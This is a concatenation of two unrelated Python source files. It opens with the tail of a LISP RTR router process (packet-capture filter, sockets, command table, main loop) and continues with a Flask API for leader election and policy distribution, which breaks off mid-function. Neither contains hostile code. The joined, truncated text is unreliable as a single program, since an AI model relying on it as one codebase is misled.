    pcap = pcappy.open_live(device, 9000, 0, 100)

    # Build "dst host a or b or ..." for all local addresses; 'afilter' is
    # the same address list reused for the RLOC-probe clause below.
    pfilter = "(dst host "
    afilter = ""
    for addr in lisp.lisp_get_all_addresses():
        pfilter += "{} or ".format(addr)
        afilter += "{} or ".format(addr)
    #endfor
    # Trim the trailing " or " left by the loop.
    pfilter = pfilter[0:-4]
    pfilter += ") and ((udp dst port 4341 or 8472 or 4789) or "
    pfilter += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + \
        "(ip[6]&0xe0 == 0 and ip[7] != 0))))"

    #
    # For RLOC-probe messages that come via pcap interface so we have the
    # IP header to grab the TTL.
    #
    afilter = afilter[0:-4]
    pfilter += (" or (not (src host {}) and " + \
        "((udp src port 4342 and ip[28] == 0x28) or " + \
        "(udp dst port 4342 and ip[28] == 0x12)))").format(afilter)

    lisp.lprint("Capturing packets for: '{}'".format(pfilter))
    pcap.filter = pfilter

    #
    # Enter receive loop.
    #
    pcap.loop(-1, lisp_rtr_pcap_process_packet, [device, lisp_thread])
    return
#enddef
#
# lisp_rtr_process_timer
#
# Call general timeout routine to process the RTR map-cache.
#
def lisp_rtr_process_timer():
    #
    # Periodic (60s) RTR housekeeping: drop per-nonce crypto keys, age out
    # the map-cache, and re-arm the timer.
    #
    lisp.lisp_set_exception()

    #
    # Remove nonce entries from crypto-list. Rebinding the dictionary to a
    # new empty dict drops the last references to the per-nonce key lists.
    # (The old per-element "del key" loop was a no-op: it only unbound the
    # local loop variable, not the stored keys.)
    #
    lisp.lisp_crypto_keys_by_nonce = {}

    #
    # Walk map-cache.
    #
    lisp.lisp_timeout_map_cache(lisp.lisp_map_cache)

    #
    # Restart periodic timer.
    #
    lisp_periodic_timer = threading.Timer(60, lisp_rtr_process_timer, [])
    lisp_periodic_timer.start()
    return
#enddef
#
# lisp_rtr_startup
#
# Intialize this LISP RTR process. This function returns no values.
#
def lisp_rtr_startup():
    #
    # Intialize this LISP RTR process: open control/raw sockets, start the
    # pcap and worker threads, load the checkpointed map-cache, and arm the
    # periodic timer. Returns True on success, False when no local
    # addresses could be determined.
    #
    global lisp_ipc_listen_socket, lisp_send_sockets, lisp_ephem_listen_socket
    global lisp_raw_socket, lisp_raw_v6_socket, lisp_threads
    global lisp_ipc_punt_socket

    lisp.lisp_i_am("rtr")
    lisp.lisp_set_exception()
    lisp.lisp_print_banner("RTR starting up")

    #
    # Get local address for source RLOC for encapsulation.
    #
    if (lisp.lisp_get_local_addresses() == False): return(False)

    #
    # Open network send socket and internal listen socket. For an RTR, that
    # may be behind a NAT, all Map-Requests are sent with the ephemeral port
    # so the Map-Request port and the ECM port will be the same.
    #
    address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
    lisp_ephem_listen_socket = lisp.lisp_open_listen_socket(address,
        str(lisp_ephem_port))
    lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-rtr")
    lisp_ipc_punt_socket = lisp.lisp_open_listen_socket("", "lispers.net-itr")
    lisp_send_sockets[0] = lisp_ephem_listen_socket
#    lisp_send_sockets[0] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4)
    lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
    lisp_send_sockets[2] = lisp_ipc_listen_socket

    #
    # Open up raw socket so we can send with IP headers after decapsulation.
    # There is a special case where the RTR's lisp_send_sockets array is of
    # size 4 since we need to pass the raw socket through the lisp.py module
    # to send a data encapsulated RLOC-probe to an ETR that sits behind a NAT.
    # The test is in lisp_send_map_request() for this. This is the case in
    # ETRs as well. All other components use an array size of 3 modulo.
    #
    lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
        socket.IPPROTO_RAW)
    lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
    lisp_send_sockets.append(lisp_raw_socket)

    if (lisp.lisp_is_raspbian() == False):
        lisp_raw_v6_socket = socket.socket(socket.AF_INET6, socket.SOCK_RAW,
            socket.IPPROTO_UDP)
    #endif

    # Thread counts come from the environment; default 1 pcap thread and
    # no worker threads.
    pcap_threads = os.getenv("LISP_PCAP_THREADS")
    pcap_threads = 1 if (pcap_threads == None) else int(pcap_threads)
    worker_threads = os.getenv("LISP_WORKER_THREADS")
    worker_threads = 0 if (worker_threads == None) else int(worker_threads)

    #
    # Setup packet capture.
    #
    for i in range(pcap_threads):
        t = lisp.lisp_thread("pcap-{}".format(i))
        t.thread_number = i
        t.number_of_pcap_threads = pcap_threads
        t.number_of_worker_threads = worker_threads
        lisp_threads.append(t)
        threading.Thread(target=lisp_rtr_pcap_thread, args=[t]).start()
    #endfor

    #
    # Start worker threads. If you want to change the number of them, only
    # this constant needs changing.
    #
    for i in range(worker_threads):
        t = lisp.lisp_thread("worker-{}".format(i))
        lisp_threads.append(t)
        threading.Thread(target=lisp_rtr_worker_thread, args=[t]).start()
    #endfor

    #
    # Load map-cache from checkpoint file before we start writing to it.
    #
    lisp.lisp_load_checkpoint()

    #
    # Should we load-split pings?
    #
    lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None)

    #
    # Start map-cache timeout timer.
    #
    lisp_periodic_timer = threading.Timer(60, lisp_rtr_process_timer, [])
    lisp_periodic_timer.start()
    return(True)
#enddef
#
# lisp_rtr_shutdown
#
# Shut down this process.
#
def lisp_rtr_shutdown():
    #
    # Shut down this process: close every control/IPC socket (each with
    # the internal name it was opened under), then the raw send socket.
    #
    for sock, sock_name in [(lisp_send_sockets[0], ""),
                            (lisp_send_sockets[1], ""),
                            (lisp_ipc_listen_socket, "lisp-rtr"),
                            (lisp_ephem_listen_socket, ""),
                            (lisp_ipc_punt_socket, "lispers.net-itr")]:
        lisp.lisp_close_socket(sock, sock_name)
    #endfor
    lisp_raw_socket.close()
    return
#enddef
#
# lisp_rtr_map_resolver_command
#
# Call lispconfig.lisp_map_resolver_command and set "test-mr" timer.
#
def lisp_rtr_map_resolver_command(kv_pair):
    #
    # Process a "lisp map-resolver" command via the shared config handler,
    # then arm the 2-second "test-mr" timer unless one is already pending.
    #
    global lisp_send_sockets
    global lisp_ephem_port

    lispconfig.lisp_map_resolver_command(kv_pair)

    timer = lisp.lisp_test_mr_timer
    if (timer == None or timer.is_alive() == False):
        lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr,
            [lisp_send_sockets, lisp_ephem_port])
        lisp.lisp_test_mr_timer.start()
    #endif
    return
#enddef
#
# lisp_rtr_xtr_command
#
# Call lispconfig.lisp_xtr_command() but pass socket parameters to starting
# the RLOC-probing timer if "rloc-probing = yes".
#
def lisp_rtr_xtr_command(kv_pair):
    #
    # Process a "lisp xtr-parameters" command through the shared handler,
    # and when this command flips rloc-probing from "no" to "yes", start
    # the RLOC-probe timer and tell the data-plane our crypto port.
    #
    global lisp_ephem_listen_socket, lisp_raw_socket, lisp_ephem_port

    was_probing = lisp.lisp_rloc_probing

    #
    # Execute command.
    #
    lispconfig.lisp_xtr_command(kv_pair)

    #
    # Trigger only on the no->yes transition.
    #
    if (was_probing == False and lisp.lisp_rloc_probing):
        lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket,
            None, lisp_raw_socket]
        lisp.lisp_start_rloc_probe_timer(1, lisp_sockets)
        entry = { "type" : "itr-crypto-port", "port" : lisp_ephem_port }
        lisp.lisp_write_to_dp_socket(entry)
    #endif

    #
    # Write to external data-plane if enabled.
    #
    lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging,
        lisp.lisp_data_plane_logging)
    return
#enddef
#
# RTR commands processed by this process.
#
#
# Command dispatch table: maps each CLI/config clause to its handler and
# the allowed keywords (each value is [value-allowed, <range-or-choices>]).
#
lisp_rtr_commands = {
    "lisp xtr-parameters" : [lisp_rtr_xtr_command, {
        "rloc-probing" : [True, "yes", "no"],
        "nonce-echoing" : [True, "yes", "no"],
        "data-plane-security" : [True, "yes", "no"],
        "data-plane-logging" : [True, "yes", "no"],
        "frame-logging" : [True, "yes", "no"],
        "flow-logging" : [True, "yes", "no"],
        "nat-traversal" : [True, "yes", "no"],
        "checkpoint-map-cache" : [True, "yes", "no"],
        "ipc-data-plane" : [True, "yes", "no"],
        "decentralized-push-xtr" : [True, "yes", "no"],
        "decentralized-pull-xtr-modulus" : [True, 1, 0xff],
        "decentralized-pull-xtr-dns-suffix" : [True],
        "register-reachable-rtrs" : [True, "yes", "no"],
        "program-hardware" : [True, "yes", "no"] }],

    "lisp map-resolver" : [lisp_rtr_map_resolver_command, {
        "mr-name" : [True],
        "ms-name" : [True],
        "dns-name" : [True],
        "address" : [True] }],

    "lisp map-cache" : [lispconfig.lisp_map_cache_command, {
        "prefix" : [],
        "mr-name" : [True],
        "ms-name" : [True],
        "instance-id" : [True, 0, 0xffffffff],
        "eid-prefix" : [True],
        "group-prefix" : [True],
        "send-map-request" : [True, "yes", "no"],
        "rloc" : [],
        "rloc-record-name" : [True],
        "rle-name" : [True],
        "elp-name" : [True],
        "address" : [True],
        "priority" : [True, 0, 255],
        "weight" : [True, 0, 100] }],

    "lisp rtr-map-cache" : [lispconfig.lisp_map_cache_command, {
        "prefix" : [],
        "instance-id" : [True, 0, 0xffffffff],
        "eid-prefix" : [True],
        "group-prefix" : [True],
        "rloc" : [],
        "rloc-record-name" : [True],
        "rle-name" : [True],
        "elp-name" : [True],
        "address" : [True],
        "priority" : [True, 0, 255],
        "weight" : [True, 0, 100] }],

    "lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
        "elp-name" : [False],
        "elp-node" : [],
        "address" : [True],
        "probe" : [True, "yes", "no"],
        "strict" : [True, "yes", "no"],
        "eid" : [True, "yes", "no"] }],

    "lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
        "rle-name" : [False],
        "rle-node" : [],
        "address" : [True],
        "level" : [True, 0, 255] }],

    "lisp json" : [lispconfig.lisp_json_command, {
        "json-name" : [False],
        "json-string" : [False] }],

    "lisp database-mapping" : [lisp_rtr_database_mapping_command, {
        "prefix" : [],
        "mr-name" : [True],
        "ms-name" : [True],
        "instance-id" : [True, 0, 0xffffffff],
        "secondary-instance-id" : [True, 0, 0xffffffff],
        "eid-prefix" : [True],
        "group-prefix" : [True],
        "dynamic-eid" : [True, "yes", "no"],
        "signature-eid" : [True, "yes", "no"],
        "rloc" : [],
        "rloc-record-name" : [True],
        "elp-name" : [True],
        "geo-name" : [True],
        "rle-name" : [True],
        "json-name" : [True],
        "address" : [True],
        "interface" : [True],
        "priority" : [True, 0, 255],
        "weight" : [True, 0, 100] }],

    # "show" commands render state; handlers are defined earlier in this file.
    "show rtr-rloc-probing" : [lisp_rtr_show_rloc_probe_command, { }],
    "show rtr-keys" : [lisp_rtr_show_keys_command, {}],
    "show rtr-map-cache" : [lisp_rtr_show_command, {}],
    "show rtr-map-cache-dns" : [lisp_rtr_show_command_dns, {}]
}
#------------------------------------------------------------------------------

#
# Main entry point for process: start the RTR, then multiplex over the
# ephemeral, IPC-command, and punt sockets until a receive fails or
# select() is interrupted, then shut down.
#
if (lisp_rtr_startup() == False):
    lisp.lprint("lisp_rtr_startup() failed")
    lisp.lisp_print_banner("RTR abnormal exit")
    exit(1)
#endif

socket_list = [lisp_ephem_listen_socket, lisp_ipc_listen_socket,
    lisp_ipc_punt_socket]

# lisp_receive()/lisp_parse_packet() expect a 3-element socket array.
ephem_sockets = [lisp_ephem_listen_socket] * 3

while (True):
    try: ready_list, w, x = select.select(socket_list, [], [])
    except: break

    #
    # Process Punt signal message from another data-plane (snabb).
    #
    if (lisp.lisp_ipc_data_plane and lisp_ipc_punt_socket in ready_list):
        lisp.lisp_process_punt(lisp_ipc_punt_socket, lisp_send_sockets,
            lisp_ephem_port)
    #endif

    #
    # Process Map-Reply messages received on ephemeral port. RLOC-probes
    # are handled on the pcap path instead, so skip them here.
    #
    if (lisp_ephem_listen_socket in ready_list):
        opcode, source, port, packet = lisp.lisp_receive(ephem_sockets[0],
            False)
        if (source == ""): break

        if (lisp.lisp_is_rloc_probe_request(packet[0])):
            lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
            continue
        #endif
        if (lisp.lisp_is_rloc_probe_reply(packet[0])):
            lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
            continue
        #endif
        lisp.lisp_parse_packet(ephem_sockets, packet, source, port)
    #endif

    #
    # Process either commands, an IPC data-packet (for testing), or any
    # protocol message on the IPC listen socket..
    #
    if (lisp_ipc_listen_socket in ready_list):
        opcode, source, port, packet = \
            lisp.lisp_receive(lisp_ipc_listen_socket, True)
        if (source == ""): break

        if (opcode == "command"):
            if (packet == "clear"):
                lisp.lisp_clear_map_cache()
                continue
            #endif
            if (packet.find("clear%") != -1):
                lispconfig.lisp_clear_decap_stats(packet)
                continue
            #endif
            lispconfig.lisp_process_command(lisp_ipc_listen_socket, opcode,
                packet, "lisp-rtr", [lisp_rtr_commands])
        elif (opcode == "api"):
            lisp.lisp_process_api("lisp-rtr", lisp_ipc_listen_socket, packet)
        elif (opcode == "data-packet"):
            lisp_rtr_data_plane(packet, "")
        else:
            if (lisp.lisp_is_rloc_probe_request(packet[0])):
                lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
                continue
            #endif
            if (lisp.lisp_is_rloc_probe_reply(packet[0])):
                lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
                continue
            #endif
            lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
        #endif
    #endif
#endwhile

lisp_rtr_shutdown()
lisp.lisp_print_banner("RTR normal exit")
exit(0)

#------------------------------------------------------------------------------
|
main.py | #!/usr/bin/env python3
"""
RESOURCE MANAGEMENT - POLICIES MODULE
Sub-Modules:
- Agent Start [AS]
- Leader Protection [LP]
- Area Resilience [AR]
- Leader Reelection [LR]
"""
from common.logs import LOG
from common.common import CPARAMS, URLS
from logging import DEBUG, INFO
from leaderprotection.arearesilience import AreaResilience
from agentstart.agentstart import AgentStart
from leaderprotection.leaderreelection import LeaderReelection
from policies.policiesdistribution import PoliciesDistribution
from lightdiscovery.lightdiscovery import LightDiscovery
from flask import Flask, request
from flask_restplus import Api, Resource, fields
from threading import Thread
from time import sleep
import requests
# Module metadata.
__status__ = 'Production'
__maintainer__ = 'Alejandro Jurnet'
__email__ = 'ajurnet@ac.upc.edu'
__version__ = 'b2.4.1'
__author__ = 'Universitat Politècnica de Catalunya'

# ### Global Variables ### #
# Module-level singletons shared by every API endpoint below.
arearesilience = AreaResilience()
agentstart = AgentStart()
policiesdistribution = PoliciesDistribution()
# NOTE(review): constructed with empty deviceID/deviceIP placeholders --
# confirm these are populated elsewhere before beaconning/scanning starts.
lightdiscovery = LightDiscovery('', '')
# ### main.py code ### #

# Set Logger level from the DEBUG_FLAG environment parameter.
if CPARAMS.DEBUG_FLAG:
    LOG.setLevel(DEBUG)
else:
    LOG.setLevel(INFO)

LOG.info('Policies Module. Version {} Status {}'.format(__version__,__status__))

# Print env variables
LOG.debug('Environment Variables: {}'.format(CPARAMS.get_all()))

# Prepare Server: Flask app plus flask-restplus API wrapper and the three
# operation namespaces (CRM, Resource Manager, Light Discovery).
app = Flask(__name__)
app.url_map.strict_slashes = False
api = Api(app, version=__version__, title='Control Resilience Management Module - {}'.format(CPARAMS.DEVICEID_FLAG), description='API')

pl = api.namespace('crm-api', description='CRM Operations')
rm = api.namespace('rm', description='Resource Manager Operations')
ld = api.namespace('ld', description='Light Discovery Operations')
# Swagger/marshalling models for the REST payloads exchanged by this module.
reelection_model = api.model('Reelection_msg', {
    'deviceID': fields.String(required=True, description='The deviceID of the device that is promoted as new leader.')
})

keepalive_model = api.model('Keepalive Message', {
    'deviceID': fields.String(required=True, description='The deviceID of the device that is sending the message.')
})

keepalive_reply_model = api.model('Keepalive Reply Message', {
    'deviceID': fields.String(required=True, description='The deviceID of the device that is replying the message.'),
    'backupPriority': fields.Integer(required=True, description='Order of the backup in the area.'),
    'controlInformation': fields.String(required=False, description='Control Data Replication payload.')
})

leader_info_model = api.model('Leader Info Message', {
    'imLeader': fields.Boolean(required=True, description='If the actual role is Leader'),
    'imBackup': fields.Boolean(required=True, description='If the actual role is Backup')
})

components_info_model = api.model('Resource Manager Components Information', {
    "started": fields.Boolean(description='The agent is started'),
    "running": fields.Boolean(description='The agent is currently running'),
    "modules": fields.List(fields.String, description='List of modules that are triggered on starting'),
    "discovery": fields.Boolean(description='Discovery module is started'),
    "identification": fields.Boolean(description='Identification module is started'),
    "cau_client": fields.Boolean(description='CAUClient module is started'),
    "categorization": fields.Boolean(description='Categorization module is started'),
    "policies": fields.Boolean(description='Policies module is started'),
    "discovery_description": fields.String(description='Discovery module description / parameters received'),
    "identification_description": fields.String(description='Identification module description / parameters received'),
    "categorization_description": fields.String(description='Categorization module description / parameters received'),
    "policies_description": fields.String(description='Policies module description / parameters received'),
    "cau_client_description": fields.String(description='CAUClient module description / parameters received')
})

policies_distr_model = api.model('Policies',{
    "LMR": fields.String(description='Leader Mandatory Requirements policies in JSON format.'),
    "LDR": fields.String(description='Leader Discretionary Requirements in JSON format.'),
    "PLSP": fields.String(description='Passive Leader Selection Policies in JSON format.'),
    "ALSP": fields.String(description='Automatic Leader Selection Policies in JSON format.'),
    "LPP": fields.String(description='Leader Protection Policies in JSON format.'),
    "LRP": fields.String(description='Leader Reelection Policies in JSON format.'),
    "DP": fields.String(description='Distribution Policies in JSON format.')
})

beacon_reply_model = api.model('Beacon Reply',{
    "deviceID": fields.String(required=True, description='ID of the Agent'),
    "deviceIP": fields.String(required=True, description='IP of the Agent'),
    "cpu_cores": fields.Integer(required=True, description='Number of Logical Cores of Device'),
    "mem_avail": fields.Float(required=True, description='Virtual Memory Available'),
    "stg_avail": fields.Float(required=True, description='Device Total Storage Available'),
})
# API Endpoints
# #### Resource Manager #### #
@rm.route('/components')
class ResourceManagerStatus(Resource):
    """Resource Manager components status"""
    @rm.doc('get_components')
    @rm.marshal_with(components_info_model)
    @rm.response(200, 'Components Information')
    def get(self):
        """Get resource manager module start status"""
        # Each '<module>_failed' attribute is tri-state: None means the
        # module was never triggered, so the flag maps to False; otherwise
        # the flag is the negation of the failure indicator.
        payload = {
            'started': agentstart.isStarted,
            'running': agentstart._connected, # TODO: Private variable exposed here (soft)
            'modules': ['discovery', 'identification', 'cau_client', 'categorization', 'policies'],
            'discovery': not agentstart.discovery_failed if agentstart.discovery_failed is not None else False,
            'identification': not agentstart.identification_failed if agentstart.identification_failed is not None else False,
            'cau_client': not agentstart.cauclient_failed if agentstart.cauclient_failed is not None else False,
            'categorization': not agentstart.categorization_failed if agentstart.categorization_failed is not None else False,
            'policies': not agentstart.policies_failed if agentstart.policies_failed is not None else False
        }
        # Attach a human-readable description per module: detail when the
        # module came up, a fixed error string otherwise.
        # if fcjp.isLeader:  # I'm a leader #TODO; Decide if there is any distinction if leader
        payload.update({'discovery_description': 'detectedLeaderID: \"{}\", MACaddr: \"{}\"'.format(
            agentstart.detectedLeaderID, agentstart.MACaddr) if payload.get(
            'discovery') else 'Discovery not started or error on trigger.'})
        payload.update({'identification_description': 'IDKey: \"{}\", deviceID: \"{}\"'.format(agentstart.IDkey,
            agentstart.deviceID) if payload.get(
            'identification') else 'Identification not started or error on trigger.'})
        payload.update(
            {'categorization_description': 'Started: {}'.format(agentstart.categorization_started) if payload.get(
                'categorization') else 'RCategorization not started or error on trigger.'})
        payload.update({'policies_description': 'LPP: {}'.format(agentstart.arearesilience_started) if payload.get(
            'policies') else 'Policies (LPP) not started or error on trigger.'})
        payload.update(
            {'cau_client_description': 'authenticated: {}, secureConnection: {}'.format(agentstart.isAuthenticated,
                agentstart.secureConnection) if payload.get(
                'cau_client') else 'CAU_client not started or error on trigger.'})
        return payload, 200
# #### Policies Module #### #
@pl.route(URLS.END_START_FLOW) # Start Agent
class startAgent(Resource):
    """Start Agent"""
    @pl.doc('get_startAgent')
    @pl.response(200, 'Started')
    @pl.response(403, 'Already Started')
    def get(self):
        """Start Agent"""
        # Trigger the agent start sequence; a falsy result means it was
        # already running, which is reported as 403 with started=True.
        started = agentstart.start(CPARAMS.LEADER_FLAG)
        if not started:
            return {'started': True}, 403
        return {'started': started}, 200
@pl.route(URLS.END_POLICIES) # Area Resilience
class startAR(Resource):
    """Start Area Resilience"""
    @pl.doc('get_startAR')
    @pl.response(200, 'Started')
    @pl.response(403, 'Already Started')
    def get(self):
        """Start Agent Resilience"""
        # Launch the Area Resilience (leader protection) sub-module using
        # the deviceID obtained during agent start; a falsy result means it
        # was already running, reported as 403 with started=True.
        started = arearesilience.start(agentstart.deviceID)
        if not started:
            return {'started': True}, 403
        return {'started': started}, 200
# noinspection PyUnresolvedReferences
@pl.route('/roleChange/<string:role>')  # TODO: Parametrized Endpoint
@pl.param('role', 'The requested role to change.')
class role_change(Resource):
    """Promotion/Demotion of the agent role."""
    @pl.doc('get_change')
    @pl.response(200, 'Successful')
    @pl.response(403, 'Not Successful')
    @pl.response(404, 'Role not found')
    def get(self, role):
        """Promotion/Demotion of the agent role.

        Accepts 'leader', 'backup' or 'agent' (case-insensitive) and
        transitions this device's resilience role accordingly. Replies
        with the resulting imLeader/imBackup flags.
        """
        # BUG FIX: the docstring was previously placed *after* the
        # `global` statement, making it a dead string expression rather
        # than the method's docstring.
        global arearesilience
        imLeader = arearesilience.imLeader()
        imBackup = arearesilience.imBackup()
        if role.lower() == 'leader':
            if imLeader:
                # Already a Leader: nothing to promote.
                LOG.debug('Role change: Leader -> Leader')
                return {'imLeader': imLeader, 'imBackup': imBackup}, 403
            elif imBackup:
                # Backup takes over leadership: stop scanning, start beaconning.
                LOG.debug('Role change: Backup -> Leader')
                # ret = agentstart.switch(imLeader=True)
                lightdiscovery.stopScanning()
                ret = lightdiscovery.startBeaconning()
                if ret:
                    LOG.info('Successful promotion to Leader')
                else:
                    LOG.warning('Unsuccessful promotion from Backup to Leader')
                return {'imLeader': True, 'imBackup': False}, 200
            else:
                # A plain agent must first become a Backup before reelection.
                LOG.debug('Role change: Agent -> Leader')
                return {'imLeader': imLeader, 'imBackup': imBackup}, 403
        elif role.lower() == 'backup':
            if imLeader:
                # A Leader cannot demote directly into Backup.
                LOG.debug('Role change: Leader -> Backup')
                return {'imLeader': imLeader, 'imBackup': imBackup}, 403
            elif imBackup:
                # Already a Backup: nothing to do.
                LOG.debug('Role change: Backup -> Backup')
                return {'imLeader': imLeader, 'imBackup': imBackup}, 403
            else:
                # Agent promoted to Backup by the calling Leader.
                LOG.debug('Role change: Agent -> Backup')
                leaderIP = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
                LOG.debug('Leader at {} is selecting me as Backup'.format(leaderIP))
                ret = arearesilience.promotedToBackup(leaderIP=leaderIP)  # TODO: get leaderIP from CIMI
                if ret:
                    LOG.info('Successful promotion to Backup')
                    return {'imLeader': imLeader, 'imBackup': True}, 200
                else:
                    LOG.warning('Unsuccessful promotion from Agent to Backup')
                    return {'imLeader': arearesilience.imLeader(), 'imBackup': arearesilience.imBackup()}, 403
        elif role.lower() == 'agent':
            if imLeader:
                # Leader demotion: stop leader duties and respawn resilience
                # as a plain agent.
                LOG.debug('Role change: Leader -> Agent')
                arearesilience.stop()
                # agentstart.switch(imLeader=False)
                lightdiscovery.stopBeaconning()
                lightdiscovery.startScanning()
                CPARAMS.LEADER_FLAG = False
                arearesilience = AreaResilience(cimi, policiesdistribution.LPP)
                arearesilience.start(agentstart.deviceID)
                return {'imLeader': False, 'imBackup': False}, 200
            elif imBackup:
                # Backup demotion: respawn resilience as a plain agent.
                LOG.debug('Role change: Backup -> Agent')
                arearesilience.stop()
                arearesilience = AreaResilience(cimi, policiesdistribution.LPP)
                arearesilience.start(agentstart.deviceID)
                return {'imLeader': False, 'imBackup': False}, 200
            else:
                # Already a plain agent: nothing to demote.
                LOG.debug('Role change: Agent -> Agent')
                return {'imLeader': False, 'imBackup': False}, 403
        else:
            # Unknown role requested.
            return {'imLeader': imLeader, 'imBackup': imBackup}, 404
@pl.route('/reelection')
class reelection(Resource):
    """Reelection of the Leader"""
    @pl.doc('post_reelection')
    @pl.expect(reelection_model)
    @pl.response(200, 'Reelection Successful')
    @pl.response(401, 'The Agent is not authorized to trigger the reelection')
    @pl.response(403, 'Reelection failed')
    @pl.response(404, 'Device not found or IP not available')
    def post(self):
        """Trigger a Leader reelection in favour of the given deviceID."""
        deviceID = api.payload['deviceID']
        # Resolve the candidate's IP from the (mocked) topology.
        found = False
        deviceIP = ''
        for device in cimi('topology', default=[]):  # TODO: use real topology
            if device.get('deviceID') == deviceID:
                found = True
                deviceIP = device.get('deviceIP')
                break
        reply = {'deviceID': deviceID, 'deviceIP': deviceIP}
        if not arearesilience.imLeader():
            LOG.error('Device is not a Leader, cannot perform a reelection in a non-leader device.')
            return reply, 401
        if not found:
            LOG.error('Device {} not found in the topology'.format(deviceID))
            return reply, 404
        status = 200 if LeaderReelection.reelection(arearesilience, deviceID, deviceIP) else 403
        return reply, status
@pl.route('/keepalive')
class keepalive(Resource):
    """Keepalive entrypoint"""
    @pl.doc('post_keepalive')
    @pl.expect(keepalive_model)
    @pl.marshal_with(keepalive_reply_model, code=200)
    @pl.response(200, 'Leader alive')
    @pl.response(403, 'Agent not authorized (Not recognized as backup)')
    @pl.response(405, 'Device is not a Leader')
    def post(self):
        """Keepalive entrypoint for Leader"""
        if not arearesilience.imLeader():
            # Only a Leader may answer keepalives from its backups.
            return {'deviceID': agentstart.deviceID,
                    'backupPriority': arearesilience.PRIORITY_ON_FAILURE}, 405
        sender = api.payload['deviceID']
        correct, priority = arearesilience.receive_keepalive(sender)
        LOG.debug('Device {} has sent a keepalive. Result correct: {}, Priority: {}'.format(sender, correct, priority))
        status = 200 if correct else 403
        return {'deviceID': agentstart.deviceID, 'backupPriority': priority}, status
@pl.route('/leaderinfo')
class leaderInfo(Resource):  # TODO: Provisional, remove when possible
    """Leader and Backup information"""
    @pl.doc('get_leaderinfo')
    @pl.marshal_with(leader_info_model, code=200)
    @pl.response(200, 'Leader and Backup Information')
    def get(self):
        """Report whether this device is currently Leader and/or Backup."""
        reply = {
            'imLeader': arearesilience.imLeader(),
            'imBackup': arearesilience.imBackup(),
        }
        return reply, 200
@pl.route(URLS.END_POLICIESDISTR_RECV)
class policyDistr(Resource):
    """Policies Distribution Entrypoint"""
    @pl.doc('post_policies')
    @pl.expect(policies_distr_model)
    @pl.response(200, 'Policies correctly received')
    @pl.response(400, 'Message malformation')
    def post(self):
        """Policies Distribution Reception"""
        correct = policiesdistribution.receivePolicies(api.payload)
        if correct:
            return {'result': correct}, 200
        # BUG FIX: was `return 400`, which Flask treats as a response
        # *body* (or rejects outright), not as an HTTP 400 status.
        return {'result': correct}, 400
@pl.route(URLS.END_POLICIESDISTR_TRIGGER)
class policyTrigger(Resource):
    """Policies Distribution Send Trigger"""
    @pl.doc('get_triggerpolicies')
    @pl.response(200, 'Trigger accepted')
    def get(self):
        """Policies Distribution Send Trigger"""
        # default=[] keeps the comprehension safe if the key is unknown
        iplist = [item.get('deviceIP') for item in cimi('topology', default=[])]
        policiesdistribution.distributePolicies(iplist)
        # BUG FIX: was `return 200` (bare int becomes the body, not the
        # status); return an empty body with an explicit HTTP 200.
        return '', 200
@pl.route(URLS.END_POLICIESGET)
class policyGetCurrent(Resource):
    """Policies Distribution Get Current Policies"""
    @pl.doc('get_currentpolicies')
    @pl.response(200, 'Policies received')
    @pl.marshal_with(policies_distr_model, code=200)
    def get(self):
        """Return the policies currently held by the distribution module."""
        current = policiesdistribution.getPolicies()
        return current, 200
@ld.route(URLS.END_BEACONREPLY)
class beaconReply(Resource):
    """Beacon Reply"""
    @ld.doc('post_beaconreply')
    @ld.expect(beacon_reply_model)
    @ld.response(200, 'Device added/modified on the topology')
    @ld.response(400, 'Error on beacon reply message')
    def post(self):
        """Register a beacon reply from an agent into the topology."""
        # Prefer the reverse-proxy header when present.
        deviceIP = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
        accepted = lightdiscovery.recv_reply(api.payload, deviceIP)
        return ('', 200) if accepted else ('', 400)
# noinspection PyUnresolvedReferences
@ld.route('{}/<string:mode>/<string:operation>'.format(URLS.END_LDISCOVERY_CONTROL))
@ld.param('mode', description='LDiscovery mode (beacon/scan)')
@ld.param('operation', description='Operation on LDiscovery (start/stop)')
class ldiscoveryControl(Resource):
    """Control the LDiscovery Module"""
    @ld.doc('get_control_ld')
    @ld.response(200, 'Successful operation')
    @ld.response(400, 'Error on operation')
    @ld.response(404, 'Mode/Operation not found')
    def get(self, mode, operation):
        """Start/stop beaconning (Leader) or scanning (Agent).

        404 for an unknown mode/operation pair, 400 when the module
        reports the operation failed, 200 otherwise.
        """
        actions = {
            ('beacon', 'start'): lightdiscovery.startBeaconning,
            ('beacon', 'stop'): lightdiscovery.stopBeaconning,
            ('scan', 'start'): lightdiscovery.startScanning,
            ('scan', 'stop'): lightdiscovery.stopScanning,
        }
        action = actions.get((mode.lower(), operation.lower()))
        if action is None:
            return '', 404
        return ('', 200) if action() else ('', 400)
@ld.route(URLS.END_LDISCOVERY_TOPOLOGY)
class ldiscoveryTopology(Resource):
    """Get the current topology"""
    @ld.doc('get_topology')
    @ld.response(200, 'Topology Successful received')
    def get(self):
        """Return the topology known by the LDiscovery module."""
        topology = lightdiscovery.get_topology()
        return {'topology': topology}, 200
# Main program: CIMI mock, module initialization and entry point.
def cimi(key, default=None):
    """Mocked CIMI accessor.

    Supported keys: 'leader' (leader flag), 'topology' (list of
    {'deviceID', 'deviceIP'} dicts from LDiscovery) and 'disc_leaderIP'
    (leader IP discovered by LDiscovery). Any other key returns
    ``default``.
    """
    if key == 'leader':
        return CPARAMS.LEADER_FLAG
    if key == 'topology':
